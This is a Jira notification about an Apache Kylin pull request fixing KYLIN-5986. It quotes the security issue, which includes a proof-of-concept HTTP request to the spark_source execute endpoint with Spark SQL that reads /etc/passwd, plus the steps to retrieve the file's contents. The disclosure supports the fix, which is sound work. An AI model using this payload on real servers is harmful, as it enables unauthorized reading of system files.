[
https://issues.apache.org/jira/browse/KYLIN-5986?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17926685#comment-17926685
]
ASF GitHub Bot commented on KYLIN-5986:
---------------------------------------
jlfsdtc opened a new pull request, #2248:
URL: https://github.com/apache/kylin/pull/2248
## Proposed changes
Describe the big picture of your changes here to communicate to the
maintainers why we should accept this pull request. If it fixes a bug or
resolves a feature request, be sure to link to that issue.
## Branch to commit
- [ ] Branch **kylin3** for v2.x to v3.x
- [ ] Branch **kylin4** for v4.x
- [x] Branch **kylin5** for v5.x
## Types of changes
What types of changes does your code introduce to Kylin?
_Put an `x` in the boxes that apply_
- [X ] Bugfix (non-breaking change which fixes an issue)
- [ ] New feature (non-breaking change which adds functionality)
- [ ] Breaking change (fix or feature that would cause existing
functionality to not work as expected)
- [ ] Documentation Update (if none of the other choices apply)
## Checklist
_Put an `x` in the boxes that apply. You can also fill these out after
creating the PR. If you're unsure about any of them, don't hesitate to ask.
We're here to help! This is simply a reminder of what we are going to look for
before merging your code._
- [x] I have created an issue on [Kylin's
jira](https://issues.apache.org/jira/browse/KYLIN), and have described the
bug/feature there in detail
- [x] Commit messages in my PR start with the related jira ID, like
"KYLIN-0000 Make Kylin project open-source"
- [ ] Compiling and unit tests pass locally with my changes
- [ ] I have added tests that prove my fix is effective or that my feature
works
- [ ] I have added necessary documentation (if appropriate)
- [x] Any dependent changes have been merged
## Further comments
If this is a relatively large or complex change, kick off the discussion at
[email protected] or [email protected] by explaining why you chose the
solution you did and what alternatives you considered, etc...
> [Security] Apache kylin read any file
> -------------------------------------
>
> Key: KYLIN-5986
> URL: https://issues.apache.org/jira/browse/KYLIN-5986
> Project: Kylin
> Issue Type: Bug
> Affects Versions: 5.0.0
> Reporter: Longfei Jiang
> Assignee: Longfei Jiang
> Priority: Major
> Fix For: 5.0.1
>
> Attachments: Fwd_ [Security]Apache kylin read any file.eml,
> image-2025-02-13-11-11-05-091.png, image-2025-02-13-11-11-30-021.png,
> image-2025-02-13-11-11-40-004.png, image-2025-02-13-11-11-48-871.png,
> image-2025-02-13-11-11-57-464.png
>
>
> *1. start kylin-docker*
> ```sh
> docker run --platform=linux/amd64 -d --name Kylin5-Machine --hostname
> localhost -e TZ=UTC -m 10G -p 7070:7070 -p 8088:8088 -p
> 9870:9870 -p 8032:8032 -p 8042:8042 -p 2181:2181
> apachekylin/apache-kylin-standalone:5.0.0-GA
> ```
> *2. change kylin.properties*
> Add `kylin.env.channel=cloud` into the file `kylin.properties`. This is to
> make `org.apache.kylin.rest.controller.SparkSourceController` work
> !image-2025-02-13-11-11-05-091.png! image.png
> *3. restart server*
> ```
> ./kylin.sh stop
> ./kylin.sh start
> ```
> # Exploit
> 1.Log in to the backend using an administrator account
> 2.http access `/kylin/api/spark_source/execute` to execute spark sql
> ```http
> POST /kylin/api/spark_source/execute HTTP/1.1
> Host: 127.0.0.1:7070
> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
> (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Viewer/99.9.8782.87
> Accept: application/vnd.apache.kylin-v4+json
> Accept-Language: cn
> Accept-Encoding: gzip, deflate, br
> Auto: false
> X-Requested-With: XMLHttpRequest
> DNT: 1
> Connection: keep-alive
> Referer: http://127.0.0.1:7070/kylin/
> Cookie:
> c24882d0760bcad26b31ef95baaaa0ed96ea8fd461b11a9695cff5e969b6d4da=MTI5MjBjZGUtNDk1Yi00YzNhLTk4OTYtMmNhOWYwZDU1MWY2;
> session=c354aed6-c0e1-4463-98de-c26bc4df312f.o-aV6G0ydMKHAQ43gc1Cc0tOndE
> Sec-Fetch-Dest: empty
> Sec-Fetch-Mode: cors
> Sec-Fetch-Site: same-origin
> sec-ch-ua-platform: "Windows"
> sec-ch-ua: "Google Chrome";v="125", "Chromium";v="125", "Not=A?Brand";v="24"
> sec-ch-ua-mobile: ?0
> Content-Type: application/json
> Content-Length: 94
> {"sql":"CREATE TABLE temp_tablea AS SELECT * from
> text.`file:///etc/passwd`","database":"SSB"}
> ```
> !image-2025-02-13-11-11-30-021.png! image.png
> 3.Add new source
> !image-2025-02-13-11-11-40-004.png! image.png
> 4.Click `Refresh now` ,this is to load tables;
> !image-2025-02-13-11-11-48-871.png! image.png
> 5.Execute the sql statement `select * from SSB.TEMP_TABLEA` to get the
> contents of the `/etc/passwd` file
> !image-2025-02-13-11-11-57-464.png! image.png
> The detailed information can be found in the email attachment: Fwd_
> [Security]Apache kylin read any file.eml
--
This message was sent by Atlassian Jira
(v8.20.10#820010)
